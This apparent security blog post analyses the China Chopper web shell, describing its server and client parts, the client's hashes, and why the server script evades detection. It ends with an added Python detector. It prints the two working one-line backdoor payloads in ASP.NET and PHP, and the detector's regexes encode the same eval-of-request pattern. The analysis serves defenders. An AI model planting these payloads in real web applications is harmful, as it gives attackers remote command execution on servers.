In part 1 of the web shell series, we provided an overview of web shells and how they manifest in an enterprise network. In this part, we take a closer look at one famous web shell.

Web shells in the wild:

There are several web shells in the wild, such as China Chopper and Cknife. According to a report from NTT, China Chopper is the second most detected malware overall and the top web shell in enterprise networks. It has been active for around 10 years. Its prevalence is likely due to its minimal footprint on the server.

Breaking the shell:

The China Chopper web shell is a simple program consisting of two components: the server and the client. The server component is a small server-side payload that is placed on the server post-exploitation. The client component is a comprehensive binary that allows a threat actor to connect to that payload and perform command-and-control (CnC) activities.

Server Component:

This is the essential component: it is placed on a compromised server and serves as a backdoor. The payload is a single small file dropped on the server, and the client communicates with this file. The payload itself can be written in several languages, such as ASP, PHP, or JSP, depending on the web server.

A sample payload placed on an IIS web server might look like this:

<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

A sample payload placed on an Apache web server might look like this:

<?php @eval($_POST['password']);?>

As can be observed, the footprint is minimal, and the payload can easily evade detection on the wire and even in the web server logs.

Client Component:

Name(s):         caidao.exe, cd.exe, chopper.exe, caidao.bin
MD5:             5001ef50c7e869253a7c152a638eab8a
SHA-256:         be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77
File Type:       PE (Win32 executable)
Parent file(s):  caidao.zip, caidao.7z
File Size:       220672 bytes (215.50 KB)

The client component is a PE binary, used to access the web shell backdoor.

The parent zip contains several files for customization and configuration.

China Chopper provides a GUI with several features and capabilities.

The threat actor implants the web shell and then connects to it with the client:

Since the client now has remote access to the web server and application, it offers several capabilities. One of them is virtual terminal (command shell) access to the server.

Detections:

The China Chopper client component is the main component, as shown above. The web shell itself has existed for a long time (since 2011), with several variants, and the client is detected fairly well by most AV engines:

However, this component never appears on the server. The server-side component is the script file, which has a minimal footprint. Since it is a server-side script, it generates no client code:

The detection rate for the server-side script itself is low, 8/57. This could easily drop to 0, since scripting languages offer the flexibility to change the code without changing its semantics, which changes both the hash values and the payload itself.
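As an added example (not from the original post), a small content-based check over the two one-liners quoted above, showing why the hash-based detection rate discussed here is so brittle: both samples are flagged on what they do (eval of request input), not on their hash, while a trivially reformatted copy has a different hash but still matches. The `php_variant` and `benign_php` samples and the rule names are constructed for this illustration.

```python
import hashlib
import re

# Constructed samples: the two one-liners quoted on this page, a hypothetical
# reformatted PHP variant, and a benign PHP snippet that also reads $_POST.
SAMPLES = {
    "asp_sample":  '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "php_sample":  "<?php @eval($_POST['password']);?>",
    "php_variant": "<?php  @eval( $_POST[ 'k1' ] ); ?>",
    "benign_php":  "<?php echo htmlspecialchars($_POST['name']); ?>",
}

# Rules keyed by name: code execution fed directly by request input.
RULES = {
    "php_eval_of_request": re.compile(
        r"eval\s*\(\s*\$_(post|get|request|cookie)\s*\[", re.I),
    "aspnet_eval_unsafe_of_request": re.compile(
        r"eval\s*\(\s*request(\.item)?\s*[\[(].*?[\])]\s*,\s*['\"]unsafe['\"]", re.I),
}


def normalize(src: str) -> str:
    """Collapse whitespace so spacing changes do not break the pattern match."""
    return re.sub(r"\s+", " ", src).strip()


def scan(src: str) -> list[str]:
    """Return the names of the rules that match the normalized source."""
    norm = normalize(src)
    return [name for name, rx in RULES.items() if rx.search(norm)]


def sha256_hex(src: str) -> str:
    """Hash of the raw file content, as a hash-based scanner would compute it."""
    return hashlib.sha256(src.encode()).hexdigest()


def report(samples: dict) -> dict:
    """Per-sample hash and rule hits, to contrast hash lookup with content rules."""
    return {name: {"sha256": sha256_hex(src), "hits": scan(src)}
            for name, src in samples.items()}


if __name__ == "__main__":
    for name, r in report(SAMPLES).items():
        print(f"{name:12} {r['sha256'][:16]}...  {r['hits'] or 'clean'}")
```

Run against a web root, the same rules would apply to each file's content; here they are applied only to the embedded samples.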